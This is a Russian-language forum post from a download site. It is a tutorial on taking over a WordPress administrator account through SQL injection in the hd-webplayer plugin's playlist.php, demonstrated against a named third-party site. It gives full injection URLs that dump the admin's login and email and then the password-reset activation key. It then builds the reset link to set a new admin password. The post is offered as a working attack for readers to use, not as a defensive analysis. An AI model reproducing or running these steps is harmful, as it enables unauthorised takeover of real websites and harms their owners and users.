Скрыть объявление
Гость отличная новость! Мы открыли доступ к ранее скрытому контенту.

Вам доступно более 44 000 видео уроков, книг и программ без VIP статуса. Более подробно ЗДЕСЬ.

Скачать Получаем доступ в админку Wordpress без расшифровки хэша

Тема в разделе "Wordpress", создана пользователем InfoNews, 21 дек 2014.

0/5, Голосов: 0

Метки:
  1. InfoNews

    InfoNews Модератор

    Сообщения:
    17.815
    Симпатии:
    19.806
    Получаем доступ в админку Wordpress без расшифровки хэша

    Приветствую. Решил написать небольшую заметку.
    Как вы знаете чтобы зайти в админ-панель Wordpress
    , нужно расшифровать хэш администратора.
    Но я понял как входить в панель без ожидания расшифровки хэша.

    Покажу на примере.
    У нас есть блог, где мы уже вывели данные из таблицы wp_users.
    Торопится выводить пароль не стоит, выведем e-mail администратора:
    Код:
    http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
    И результат запроса:
    Код:
    admin:
    Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).

    Вводим e-mail администратора который мы получили выше, и отправляем письмо.

    Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
    Делаем такой запрос:
    Код:
    http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
    И в результате мы получаем активационный код:
    Код:
    P6rd7g1bPW28zgbPCRtZ
    Теперь идем на страницу сброса пароля (При этом заполнив параметры):
    Код:
    www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
    И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.

    Далее привычная авторизация.

    Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail()
    .


     
    Отзыв После просмотра материала "Получаем доступ в админку Wordpress без расшифровки хэша" оставьте свою оценку и отзыв в данной теме
Оценить эту тему:
/5,
Поделиться: